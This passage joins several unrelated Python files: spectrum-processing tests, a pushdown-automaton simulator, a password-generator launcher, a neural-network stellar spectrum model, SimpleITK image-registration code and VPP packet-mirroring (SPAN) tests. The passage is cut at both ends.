    odd channels on mux 1, even channels on mux 2 (128 channels each).
    """
    # Full spectrum
    spec_1, spec_2 = ir_multiplexer(CHANNELS)
    assert len(spec_1) == 128
    assert len(spec_2) == 128
    assert spec_1[0] == 97
    assert spec_1[-1] == 351
    assert spec_2[0] == 98
    assert spec_2[-1] == 352
    # IR spectrum only
    spec_1, spec_2 = ir_multiplexer(CHANNELS[96:])
    assert len(spec_1) == 128
    assert len(spec_2) == 128
    assert spec_1[0] == 97
    assert spec_1[-1] == 351
    assert spec_2[0] == 98
    assert spec_2[-1] == 352
    # 2D spectra
    spectra = [CHANNELS, CHANNELS]
    spec_1, spec_2 = ir_multiplexer(spectra)
    assert len(spec_1) == 128
    assert len(spec_2) == 128
    assert spec_1[0] == 97
    assert spec_1[-1] == 351
    assert spec_2[0] == 98
    assert spec_2[-1] == 352
    # 3D spectra
    spectra = [[CHANNELS, CHANNELS]]
    spec_1, spec_2 = ir_multiplexer(spectra)
    assert len(spec_1) == 128
    assert len(spec_2) == 128
    assert spec_1[0] == 97
    assert spec_1[-1] == 351
    assert spec_2[0] == 98
    assert spec_2[-1] == 352
    # VIS spectrum only
    with raises(ValueError):
        _ = ir_multiplexer(CHANNELS[:96])
    # Dimension too high
    with raises(ValueError):
        _ = ir_multiplexer([[[CHANNELS]]])
def test_ir_hot_pixels():
    """Test IR hot pixel detector from spectra.

    Uses the BACKGROUND sideband of a real QUB fixture; both 1D (single
    background spectrum) and 2D (all lines) inputs must give the same
    known list of hot channels.
    """
    qub = QUB('1787314297_1', root=DATA)
    # 1D spectrum
    hot_pixels = ir_hot_pixels(qub['BACKGROUND'][0])
    assert len(hot_pixels) == 10
    assert_array(hot_pixels,
                 [105, 119, 124, 168, 239, 240, 275, 306, 317, 331])
    # 2D spectra
    hot_pixels = ir_hot_pixels(qub['BACKGROUND'])
    assert len(hot_pixels) == 10
    assert_array(hot_pixels,
                 [105, 119, 124, 168, 239, 240, 275, 306, 317, 331])
|
#!/usr/bin/env python3
import re
import collections
# A PDA transition: target state plus the symbols to push onto the stack.
Transfer = collections.namedtuple('Transfer', ['newstate', 'newstack'])
# Transition table: automate[state][stack_symbol][input_symbol] -> Transfer.
automate = collections.defaultdict(lambda: collections.defaultdict(dict))
# automate.txt layout: line 1 = initial stack content, line 2 = start state,
# line 3 = final states, then one "(state, input, stack) = (state, push)"
# rule per line; '_' denotes epsilon (push nothing / no input).
with open('automate.txt') as f:
    start_stack = list(f.readline().split()[-1])
    start = f.readline().split()[-1]
    end = frozenset(f.readline().split()[2:])
    for line in f:
        match = re.fullmatch(r"\s*\(\s*(\w+)\s*,\s*(\w+)\s*,\s*(\w+)\s*\)\s*=\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)\s*", line)
        state, char, stackchar, newstate, newstack = match.groups()
        # Reversed so the leftmost symbol of the rule ends up on top of the
        # stack (the stack grows towards the end of the list).
        newstack = list(reversed(newstack)) if newstack != '_' else []
        automate[state][stackchar][char] = Transfer(newstate, newstack)
def print_step(state, seq, stack):
    """Print one PDA configuration: (state, remaining input, stack top-first).

    Empty input or stack is shown as the epsilon symbol; the trailing
    turnstile chains the configurations on a single output line.
    """
    remaining = seq if seq else 'ε'
    stack_top_first = ''.join(reversed(stack)) if stack else 'ε'
    print(f'({state},{remaining},{stack_top_first}) ├─ ', end='')
def launch_automate(seq) -> None:
    """Simulate the pushdown automaton on input *seq*, printing every step.

    Acceptance requires BOTH an empty stack and a final state with the
    whole input consumed; any missing transition aborts with an error
    message (messages are user-facing and intentionally in Russian).
    """
    if (state := start) not in automate:
        print('Ошибка! Неверно задано начальное состояние! Оно отсутствует в таблице!')
        return
    # Work on a copy so repeated runs start from the original stack.
    stack = start_stack.copy()
    i = 0
    while stack:
        # '_' stands for "input exhausted" when looking up transitions.
        char = seq[i] if i < len(seq) else '_'
        print_step(state, seq[i:], stack)
        top_stack = stack.pop()
        if (transition1 := automate.get(state)) is None:
            print(f'\nОшибка! Состояние "{state}" отсутствует в таблице! Переход невозможен!')
            return
        if (transition2 := transition1.get(top_stack)) is None:
            print(f'\nОшибка: Отсутствует переход из состояния "{state}" с символом {top_stack} в стеке')
            return
        if (transition3 := transition2.get(char)) is None:
            # Fall back to an epsilon transition ('_'): the input symbol is
            # not consumed, so compensate the unconditional i += 1 below.
            if (transition3 := transition2.get('_')) is None:
                print(f'\nОшибка: Отсутствует переход из состояния "{state}" с символом {char} в цепочке с символом {top_stack} в стеке')
                return
            else:
                i -= 1
        state = transition3.newstate
        stack.extend(transition3.newstack)
        i += 1
    # Print the final configuration (stack is now empty) and the verdict.
    print_step(state, seq[i:], stack)
    if state in end and i >= len(seq):
        print('\nАвтомат допускает цепочку', seq)
    elif state not in end:
        print('\nСтек пуст, но автомат не пришёл в заключительное состояние!')
    else:
        print('\nСтек пуст, автомат в заключительном состоянии, но цепочка не кончилась!')
# Interactive driver: read chains until the user interrupts with Ctrl+C.
while True:
    try:
        seq = input('Введите цепочку. Для выхода из программы нажмите ^C\n> ')
    except KeyboardInterrupt:
        # Emit a newline so the shell prompt starts on a fresh line.
        print()
        break
    launch_automate(seq)
|
import sys
sys.path.insert(1, 'src')
from src.gen_key import Pass_key
from src.colors1 import get_colors
def main():
    """Run the password-key generator, exiting politely on Ctrl+C."""
    try:
        Pass_key.run()
    except KeyboardInterrupt:
        # The exception object was previously bound (`as ky`) but never
        # used; the colored farewell message itself is unchanged.
        print(get_colors.yellow()+get_colors.red() + "\n[!] CTRL+C Detected \n"+get_colors.cyan()+"Thanks For Usage :)")
if __name__ == "__main__":
    main()
|
# code for predicting the spectrum of a single star in normalized space.
from __future__ import absolute_import, division, print_function # python2 compatibility
import numpy as np
from . import utils
def sigmoid(z):
    """Logistic activation used by default in all our neural networks.

    A ReLU could be swapped in instead, but simple tests showed worse
    results. Works element-wise on scalars or numpy arrays.
    """
    exp_neg = np.exp(-z)
    return 1.0 / (1.0 + exp_neg)
def get_spectrum_from_neural_net(scaled_labels, NN_coeffs):
    '''
    Predict the rest-frame spectrum (normalized) of a single star.

    Input labels are the SCALED stellar labels (not in the original
    units); each label ranges from -0.5 to 0.5. NN_coeffs holds the
    weights/biases of a two-hidden-layer network plus the label
    scaling bounds (x_min, x_max), which are unused here.

    A single large network over all pixels works better than per-pixel
    networks (as in Ting+18) because it exploits the information shared
    between adjacent pixels.
    '''
    w_array_0, w_array_1, w_array_2, b_array_0, b_array_1, b_array_2, x_min, x_max = NN_coeffs
    # Two dense layers with sigmoid activations, linear output layer.
    hidden_1 = sigmoid(w_array_0 @ scaled_labels + b_array_0)
    hidden_2 = sigmoid(w_array_1 @ hidden_1 + b_array_1)
    spectrum = w_array_2 @ hidden_2 + b_array_2
    return spectrum
|
import SimpleITK as sitk
import numpy as np
from preprocessing_images_functions import *
import os
import cv2
def generate_fit_transform(
    fixed_image,
    moving_image,
    initial_transform,
    learningRate=0.5,
    numberOfIterations=200,
    convergenceMinimumValue=1e-6,
    convergenceWindowSize=10,
):
    """Optimize *initial_transform* to register *moving_image* onto *fixed_image*.

    Uses Mattes mutual information (random 5% sampling), gradient descent,
    and a 3-level multi-resolution pyramid.

    Returns:
        (final_transform, registration_method) -- the method object is
        returned so callers can query the final metric value.
    """
    registration_method = sitk.ImageRegistrationMethod()
    # Similarity metric settings.
    registration_method.SetMetricAsMattesMutualInformation(numberOfHistogramBins=50)
    registration_method.SetMetricSamplingStrategy(registration_method.RANDOM)
    # The 1234 is presumably the sampling seed (keeps runs reproducible) --
    # confirm against the SimpleITK SetMetricSamplingPercentage signature.
    registration_method.SetMetricSamplingPercentage(0.05, 1234)
    registration_method.SetInterpolator(sitk.sitkLinear)
    # Optimizer settings.
    registration_method.SetOptimizerAsGradientDescent(
        learningRate=learningRate,
        numberOfIterations=numberOfIterations,
        convergenceMinimumValue=convergenceMinimumValue,
        convergenceWindowSize=convergenceWindowSize,
    )
    registration_method.SetOptimizerScalesFromJacobian()
    # Setup for the multi-resolution framework.
    registration_method.SetShrinkFactorsPerLevel(shrinkFactors=[4, 2, 1])
    registration_method.SetSmoothingSigmasPerLevel(smoothingSigmas=[2, 1, 0])
    registration_method.SmoothingSigmasAreSpecifiedInPhysicalUnitsOn()
    # Don't optimize in-place, we would possibly like to run this cell multiple times.
    registration_method.SetInitialTransform(initial_transform, inPlace=False)
    # Connect all of the observers so that we can perform plotting during registration.
    # registration_method.AddCommand(sitk.sitkStartEvent, start_plot)
    # registration_method.AddCommand(sitk.sitkEndEvent, end_plot)
    # registration_method.AddCommand(sitk.sitkMultiResolutionIterationEvent, update_multires_iterations)
    # registration_method.AddCommand(sitk.sitkIterationEvent, lambda: plot_values(registration_method))
    final_transform = registration_method.Execute(
        sitk.Cast(fixed_image, sitk.sitkFloat32),
        sitk.Cast(moving_image, sitk.sitkFloat32),
    )
    return final_transform, registration_method
def generate_transformed_image(fixed_image, moving_image):
    """Register *moving_image* onto *fixed_image* and return the difference.

    Returns a 4-tuple:
        moving_resampled_arr   -- the registered moving image (numpy array)
        abs_differenced_images -- |registered moving - fixed| (numpy array)
        final_transform        -- the optimized sitk transform
        registration_method    -- the registration object (for its metrics)
    """
    # Initial alignment: geometrically center the two images.
    initial_transform = sitk.CenteredTransformInitializer(
        fixed_image,
        moving_image,
        sitk.Euler2DTransform(),
        sitk.CenteredTransformInitializerFilter.GEOMETRY,
    )
    # NOTE: a Resample with initial_transform used to happen here, but its
    # result was immediately overwritten by the final resample below --
    # dead computation, removed.
    final_transform, registration_method = generate_fit_transform(
        fixed_image, moving_image, initial_transform
    )
    # Resample the moving image into the fixed image's grid using the
    # optimized transform.
    moving_resampled = sitk.Resample(
        moving_image,
        fixed_image,
        final_transform,
        sitk.sitkLinear,
        0.0,
        moving_image.GetPixelID(),
    )
    moving_resampled_arr = sitk.GetArrayFromImage(moving_resampled)
    fixed_image_arr = sitk.GetArrayFromImage(fixed_image)
    differenced_images = moving_resampled_arr - fixed_image_arr
    abs_differenced_images = np.absolute(differenced_images)
    return (
        moving_resampled_arr,
        abs_differenced_images,
        final_transform,
        registration_method,
    )
def resample(image, final_transform):
    """Apply the inverse of *final_transform* to *image*.

    The image acts as its own reference, so the output keeps its origin,
    spacing, size and direction. Linear interpolation, background 0.0.
    """
    inverse = final_transform.GetInverse()
    return sitk.Resample(
        image,
        image,  # reference: output grid copied from the input itself
        inverse,
        sitk.sitkLinear,
        0.0,
        image.GetPixelID(),
    )
def crop_artifacts(img_arr, intensity_threshold=128.0):
    """Crop bright border artifacts from a (registration) difference image.

    Repeatedly finds the first non-background column, looks for pixels
    brighter than *intensity_threshold* along it, and crops everything
    up to and including them. If that row-oriented pass removes more than
    half of the image, it restarts with a column-oriented pass instead.

    NOTE(review): *mask* is computed once from the original array and never
    recomputed, while *img_arr_copy* shrinks on every iteration -- confirm
    the mask-derived indices stay aligned with the cropped array.
    """
    # create artifact mask
    mask = np.where(img_arr > intensity_threshold, 1.0, 0.0)
    # NOTE(review): basic slicing yields a view, not a copy; acceptable here
    # since the array is only re-sliced, never written to.
    img_arr_copy = img_arr[:, :]
    ### row/horizontal artifact removal ###
    artifact_remains = True
    # NOTE(review): relative_threshold is assigned below but never read
    # afterwards -- possibly leftover from the commented cleanup step.
    relative_threshold = intensity_threshold
    while artifact_remains:
        # Step 1: Find first non-background column (starting from leftmost columns)
        colsums = np.sum(mask, 0)  # "horizontal" sum
        min_idx = np.min(np.nonzero(colsums))
        # only grab first half of values, if it's in the bottom half it will be a vertical artifact, and taken care of later
        first_nonzero_vector = img_arr_copy[: int(img_arr_copy.shape[0] / 2), min_idx]
        # Step 2: Find location of relatively intense pixels in the list
        vals, counts = np.unique(first_nonzero_vector, return_counts=True)
        freq = sorted(list(zip(vals, counts)))
        intense_vals = [val[0] for val in freq if val[0] > intensity_threshold]
        # check if intense values exist, if not, all artifacts should be removed.
        if len(intense_vals) == 0:
            artifact_remains = False
            break
        relative_threshold = intense_vals[0]
        min_crop_idx = np.min(
            np.nonzero(np.where(first_nonzero_vector >= intense_vals[0], 1, 0))
        )
        max_crop_idx = np.max(
            np.nonzero(np.where(first_nonzero_vector >= intense_vals[0], 1, 0))
        )
        # Step 3: Remove all pixels below the maximum crop index & minimum original indexes found, bc they're artifacts
        img_arr_copy = img_arr_copy[max_crop_idx + 1 :, min_idx:]
    # Step 4: Check if too much was removed (column-oriented artifact versus row-oriented)
    original_area = img_arr.shape[0] * img_arr.shape[1]
    new_area = img_arr_copy.shape[0] * img_arr_copy.shape[1]
    if new_area <= original_area * 0.5:
        print("Inverse orientation required.")
        # Restart from the full image and crop row-by-row instead.
        img_arr_copy = img_arr[:, :]
        artifact_remains = True
        relative_threshold = intensity_threshold
        while artifact_remains:
            # Step 1: Find first intense-pixel row (starting from topmost row)
            rowsums = np.sum(mask, 1)
            min_y_idx = np.min(np.nonzero(rowsums))
            first_nonzero_row = img_arr_copy[min_y_idx, :]
            # Step 2: Find location of relatively intense pixels in the column
            vals, counts = np.unique(first_nonzero_row, return_counts=True)
            freq = sorted(list(zip(vals, counts)))
            # print(freq[-10:])
            intense_vals = [val[0] for val in freq if val[0] > intensity_threshold]
            # print(intense_vals)
            # check if intense values exist, if not, all artifacts should be removed.
            if len(intense_vals) == 0:
                artifact_remains = False
                break
            relative_threshold = intense_vals[0]
            min_x_idx = np.min(
                np.nonzero(np.where(first_nonzero_row >= intense_vals[0], 1, 0))
            )
            max_x_idx = np.max(
                np.nonzero(np.where(first_nonzero_row >= intense_vals[0], 1, 0))
            )
            # Step 3: Remove all pixels below the maximum y & minimum x indexes found, bc they're artifacts
            img_arr_copy = img_arr_copy[
                min_y_idx:, max_x_idx + 1 :,
            ]
    # # clean up errant pixels
    # img_arr_copy = np.where(img_arr_copy.astype(int) > relative_threshold, 0.0, img_arr)
    return img_arr_copy
def remove_artifacts(differenced_image, final_transform):
    """Undo the registration transform on a difference image and crop the
    border artifacts the inverse transform introduces.

    *differenced_image* is a numpy array; returns a numpy array.
    """
    # Convert to a SimpleITK Image so the transform can be applied.
    diff_img = sitk.GetImageFromArray(differenced_image)
    # Apply the inverse transformation, then back to a numpy array.
    inverse_arr = sitk.GetArrayFromImage(resample(diff_img, final_transform))
    # Crop the artifact pixels produced at the borders.
    return crop_artifacts(inverse_arr)
def generate_registered_images(fixed_image_arr, moving_image_arr):
    """Register the moving image array onto the fixed one and build metrics.

    Returns (moving_resampled_arr, diff_image_noartifacts, metrics):
    the registered moving image, the artifact-cropped difference image,
    and a dict quantifying the severity of the registration.
    """
    # takes in a fixed_image_arr and moving_image_arr for now let's designate left to fixed and right to be moving in array form
    # the fixed_image and moving_image_arr
    # returns moving_resammpled_arr which is the right breast after translation in array form
    # returns diff_image_noartifacts which is the overlayed and subtracted image in array form to be fed into the model
    # returns metrics which is a dictionary of metrics to show the severity of the registration
    # severity of registration is quantified by the difference in arrays before and after the registration process
    # Round-trip through temporary PNGs in the CWD so SimpleITK reads the
    # images via its file reader; presumably GetImageFromArray alone was
    # insufficient (see the commented alternative below) -- TODO confirm.
    fixedImageFile = "./fixed_image_arr.png"
    movingImageFile = "./moving_image_arr.png"
    cv2.imwrite(fixedImageFile, fixed_image_arr)
    cv2.imwrite(movingImageFile, moving_image_arr)
    fixed_image = sitk.ReadImage((fixedImageFile), sitk.sitkFloat32)
    moving_image = sitk.ReadImage((movingImageFile), sitk.sitkFloat32)
    os.remove(fixedImageFile)
    os.remove(movingImageFile)
    # fixed_image = sitk.GetImageFromArray(fixed_image_arr)
    # moving_image= sitk.GetImageFromArray(moving_image_arr)
    (
        moving_resampled_arr,
        differenced_images,
        final_transform,
        registration_method,
    ) = generate_transformed_image(fixed_image, moving_image)
    # metrics
    # after processing the fixed and moving image should be the same size so subtracting it should work
    fixed_arr = sitk.GetArrayFromImage(fixed_image)
    moving_arr = sitk.GetArrayFromImage(moving_image)
    moving_arr_sized = size_image(moving_arr, fixed_arr.shape[0], fixed_arr.shape[1])
    # euclidean distance between moving resampled and orig moving image
    moving_dist = np.linalg.norm(moving_resampled_arr - moving_arr_sized)
    breast_diff_dist = np.linalg.norm(fixed_arr - moving_arr_sized)
    final_metricval = registration_method.GetMetricValue()
    # Euler2D parameters: variable names suggest (angle, tx, ty) ordering.
    rotation_angle = final_transform.GetParameters()[0]
    trans_x = final_transform.GetParameters()[1]
    trans_y = final_transform.GetParameters()[2]
    # put this into CSV?
    metrics = {
        "final_metric": final_metricval,
        "rotation_angle": rotation_angle,
        "trans_x": trans_x,
        "trans_y": trans_y,
        "moving_dist": moving_dist,
        "init_breast_diff_dist": breast_diff_dist,
    }
    diff_image_noartifacts = remove_artifacts(differenced_images, final_transform)
    return moving_resampled_arr, diff_image_noartifacts, metrics
|
#!/usr/bin/env python3
import unittest
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q, GRE, ERSPAN
from scapy.layers.inet import IP, UDP
from scapy.layers.vxlan import VXLAN
from framework import VppTestCase, VppTestRunner
from util import Host, ppp
from vpp_sub_interface import L2_VTR_OP, VppDot1QSubint, VppDot1ADSubint
from vpp_gre_interface import VppGreInterface
from collections import namedtuple
from vpp_papi import VppEnum
# A VLAN tag as (ethertype, vlan-id) used when stripping mirrored frames.
Tag = namedtuple('Tag', ['dot1', 'vlan'])
# 802.1ad (QinQ outer) and 802.1Q ethertypes.
DOT1AD = 0x88A8
DOT1Q = 0x8100
class TestSpan(VppTestCase):
""" SPAN Test Case """
    @classmethod
    def setUpClass(cls):
        """Create the interfaces, sub-interfaces and the VXLAN tunnel
        shared by all SPAN tests in this class."""
        super(TestSpan, cls).setUpClass()
        # Test variables
        cls.pkts_per_burst = 257  # Number of packets per burst
        # create 3 pg interfaces
        cls.create_pg_interfaces(range(3))
        cls.bd_id = 55
        # pg0.100 is the mirrored source; pg2 carries two VTR-rewriting
        # destination sub-interfaces (dot1q 300 and qinq 500/400).
        cls.sub_if = VppDot1QSubint(cls, cls.pg0, 100)
        cls.vlan_sub_if = VppDot1QSubint(cls, cls.pg2, 300)
        cls.vlan_sub_if.set_vtr(L2_VTR_OP.L2_POP_1, tag=300)
        cls.qinq_sub_if = VppDot1ADSubint(cls, cls.pg2, 33, 400, 500)
        cls.qinq_sub_if.set_vtr(L2_VTR_OP.L2_POP_2, outer=500, inner=400)
        # packet flows mapping pg0 -> pg1, pg2 -> pg3, etc.
        cls.flows = dict()
        cls.flows[cls.pg0] = [cls.pg1]
        cls.flows[cls.pg1] = [cls.pg0]
        # packet sizes
        cls.pg_if_packet_sizes = [64, 512, 1518]  # , 9018]
        # setup all interfaces
        for i in cls.pg_interfaces:
            i.admin_up()
            i.config_ip4()
            i.resolve_arp()
        # VXLAN tunnel towards pg2's peer, used as a SPAN destination.
        cls.vxlan = cls.vapi.vxlan_add_del_tunnel(
            src_address=cls.pg2.local_ip4n, dst_address=cls.pg2.remote_ip4n,
            is_add=1, vni=1111)
    def setUp(self):
        """Reset per-test packet bookkeeping before each test."""
        super(TestSpan, self).setUp()
        self.reset_packet_infos()
    def tearDown(self):
        """Standard framework teardown; class-level config persists."""
        super(TestSpan, self).tearDown()
    def show_commands_at_teardown(self):
        """Log the current SPAN configuration at teardown time."""
        self.logger.info(self.vapi.ppcli("show interface span"))
def xconnect(self, a, b, is_add=1):
self.vapi.sw_interface_set_l2_xconnect(a, b, enable=is_add)
self.vapi.sw_interface_set_l2_xconnect(b, a, enable=is_add)
def bridge(self, sw_if_index, is_add=1):
self.vapi.sw_interface_set_l2_bridge(rx_sw_if_index=sw_if_index,
bd_id=self.bd_id, enable=is_add)
    def _remove_tag(self, packet, vlan, tag_type):
        """Strip one VLAN tag from *packet* in place.

        Asserts the outer ethertype and VLAN id match, then splices the
        inner payload directly under the Ether layer and restores the
        inner ethertype.
        """
        self.assertEqual(packet.type, tag_type)
        payload = packet.payload
        self.assertEqual(payload.vlan, vlan)
        # Remember the ethertype carried inside the tag before unwrapping.
        inner_type = payload.type
        payload = payload.payload
        packet.remove_payload()
        packet.add_payload(payload)
        packet.type = inner_type
def remove_tags(self, packet, tags):
for t in tags:
self._remove_tag(packet, t.vlan, t.dot1)
return packet
    def decap_gre(self, pkt):
        """
        Decapsulate the original payload frame by removing GRE header
        """
        # Outer frame must be VPP (pg2 local) towards the remote peer.
        self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
        self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
        self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
        self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
        return pkt[GRE].payload
    def decap_erspan(self, pkt, session):
        """
        Decapsulate the original payload frame by removing ERSPAN header

        Also validates the outer Ether/IP addressing and every ERSPAN
        header field, including the expected *session* id.
        """
        self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
        self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
        self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
        self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
        # ERSPAN header sanity: version 1, untagged, no priority, en=3.
        self.assertEqual(pkt[ERSPAN].ver, 1)
        self.assertEqual(pkt[ERSPAN].vlan, 0)
        self.assertEqual(pkt[ERSPAN].cos, 0)
        self.assertEqual(pkt[ERSPAN].en, 3)
        self.assertEqual(pkt[ERSPAN].t, 0)
        self.assertEqual(pkt[ERSPAN].session_id, session)
        self.assertEqual(pkt[ERSPAN].reserved, 0)
        self.assertEqual(pkt[ERSPAN].index, 0)
        return pkt[ERSPAN].payload
    def decap_vxlan(self, pkt):
        """
        Decapsulate the original payload frame by removing VXLAN header
        """
        # Outer frame must be VPP (pg2 local) towards the remote peer.
        self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
        self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
        self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
        self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
        return pkt[VXLAN].payload
def create_stream(self, src_if, packet_sizes, do_dot1=False, bcast=False):
pkts = []
dst_if = self.flows[src_if][0]
dst_mac = src_if.remote_mac
if bcast:
dst_mac = "ff:ff:ff:ff:ff:ff"
for i in range(0, self.pkts_per_burst):
payload = "span test"
size = packet_sizes[int((i / 2) % len(packet_sizes))]
p = (Ether(src=src_if.local_mac, dst=dst_mac) /
IP(src=src_if.remote_ip4, dst=dst_if.remote_ip4) /
UDP(sport=10000 + src_if.sw_if_index * 1000 + i, dport=1234) /
Raw(payload))
if do_dot1:
p = self.sub_if.add_dot1_layer(p)
self.extend_packet(p, size)
pkts.append(p)
return pkts
def verify_capture(self, cap1, cap2):
self.assertEqual(len(cap1), len(cap2),
"Different number of sent and mirrored packets :"
"%u != %u" % (len(cap1), len(cap2)))
pkts1 = [(pkt[Ether] / pkt[IP] / pkt[UDP]) for pkt in cap1]
pkts2 = [(pkt[Ether] / pkt[IP] / pkt[UDP]) for pkt in cap2]
self.assertEqual(pkts1.sort(), pkts2.sort())
    def test_device_span(self):
        """ SPAN device rx mirror

        Traffic received on pg0 (xconnected to pg1) must also be
        mirrored, unmodified, to pg2.
        """
        # Create bi-directional cross-connects between pg0 and pg1
        self.xconnect(self.pg0.sw_if_index, self.pg1.sw_if_index)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(self.pg0, self.pg_if_packet_sizes)
        self.pg0.add_stream(pkts)
        # Enable SPAN on pg0 (mirrored to pg2)
        self.vapi.sw_interface_span_enable_disable(
            self.pg0.sw_if_index, self.pg2.sw_if_index)
        self.logger.info(self.vapi.ppcli("show interface span"))
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Every packet forwarded to pg1 must also appear on pg2.
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = self.pg2.get_capture(n_pkts)
        # Disable SPAN on pg0 (mirrored to pg2)
        self.vapi.sw_interface_span_enable_disable(
            self.pg0.sw_if_index, self.pg2.sw_if_index, state=0)
        self.xconnect(self.pg0.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_pkts)
    def test_span_l2_rx(self):
        """ SPAN l2 rx mirror

        Dot1q traffic received on the pg0.100 sub-interface must be
        mirrored to pg2 (which sits in the bridge domain).
        """
        self.sub_if.admin_up()
        self.bridge(self.pg2.sw_if_index)
        # Create bi-directional cross-connects between pg0 subif and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        # Enable SPAN on pg0 (mirrored to pg2)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1)
        self.logger.info(self.vapi.ppcli("show interface span"))
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Verify the mirrored stream on pg2 matches the forwarded one.
        pg2_expected = len(pkts)
        pg1_pkts = self.pg1.get_capture(pg2_expected)
        pg2_pkts = self.pg2.get_capture(pg2_expected)
        self.bridge(self.pg2.sw_if_index, is_add=0)
        # Disable SPAN on pg0 (mirrored to pg2)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_pkts)
    def test_span_l2_rx_dst_vxlan(self):
        """ SPAN l2 rx mirror into vxlan

        Mirrored frames leave through the VXLAN tunnel; they are
        decapsulated before comparing against the forwarded stream.
        """
        self.sub_if.admin_up()
        # Bring the tunnel interface up (flags=1 == admin up).
        self.vapi.sw_interface_set_flags(self.vxlan.sw_if_index,
                                         flags=1)
        self.bridge(self.vxlan.sw_if_index, is_add=1)
        # Create bi-directional cross-connects between pg0 subif and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        # Enable SPAN on pg0 sub if (mirrored to vxlan)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.vxlan.sw_if_index, is_l2=1)
        self.logger.info(self.vapi.ppcli("show interface span"))
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Decapsulate the VXLAN copies before comparison.
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = [self.decap_vxlan(p) for p in self.pg2.get_capture(n_pkts)]
        self.bridge(self.vxlan.sw_if_index, is_add=0)
        # Disable SPAN on pg0 sub if (mirrored to vxlan)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, self.vxlan.sw_if_index, state=0, is_l2=1)
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_pkts)
    def test_span_l2_rx_dst_gre_erspan(self):
        """ SPAN l2 rx mirror into gre-erspan

        Mirrored frames leave through a GRE/ERSPAN tunnel (session 543);
        the ERSPAN header is validated and stripped before comparison.
        """
        self.sub_if.admin_up()
        gre_if = VppGreInterface(self, self.pg2.local_ip4,
                                 self.pg2.remote_ip4,
                                 session=543,
                                 type=(VppEnum.vl_api_gre_tunnel_type_t.
                                       GRE_API_TUNNEL_TYPE_ERSPAN))
        gre_if.add_vpp_config()
        gre_if.admin_up()
        self.bridge(gre_if.sw_if_index)
        # Create bi-directional cross-connects between pg0 and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
        # Create incoming packet streams for packet-generator interfaces
        pkts = self.create_stream(
            self.pg0, self.pg_if_packet_sizes, do_dot1=True)
        self.pg0.add_stream(pkts)
        # Enable SPAN on pg0 sub if (mirrored to gre-erspan)
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, gre_if.sw_if_index, is_l2=1)
        # Enable packet capturing and start packet sending
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # Validate + strip the ERSPAN encapsulation before comparing.
        n_pkts = len(pkts)
        pg1_pkts = self.pg1.get_capture(n_pkts)
        pg2_pkts = self.pg2.get_capture(n_pkts)
        def decap(p): return self.decap_erspan(p, session=543)
        pg2_decaped = [decap(p) for p in pg2_pkts]
        self.bridge(gre_if.sw_if_index, is_add=0)
        # Disable SPAN on pg0 sub if
        self.vapi.sw_interface_span_enable_disable(
            self.sub_if.sw_if_index, gre_if.sw_if_index, state=0, is_l2=1)
        gre_if.remove_vpp_config()
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
        self.verify_capture(pg1_pkts, pg2_decaped)
    def test_span_l2_rx_dst_gre_subif_vtr(self):
        """ SPAN l2 rx mirror into gre-subif+vtr

        Mirrored frames leave through a dot1q sub-interface (VTR pushes
        tag 500) on a TEB GRE tunnel; both the GRE header and the pushed
        tag are stripped before comparison.
        """
        self.sub_if.admin_up()
        gre_if = VppGreInterface(self, self.pg2.local_ip4,
                                 self.pg2.remote_ip4,
                                 type=(VppEnum.vl_api_gre_tunnel_type_t.
                                       GRE_API_TUNNEL_TYPE_TEB))
        gre_if.add_vpp_config()
        gre_if.admin_up()
        gre_sub_if = VppDot1QSubint(self, gre_if, 500)
        gre_sub_if.set_vtr(L2_VTR_OP.L2_POP_1, tag=500)
        gre_sub_if.admin_up()
        self.bridge(gre_sub_if.sw_if_index)
        # Create bi-directional cross-connects between pg0 and pg1
        self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
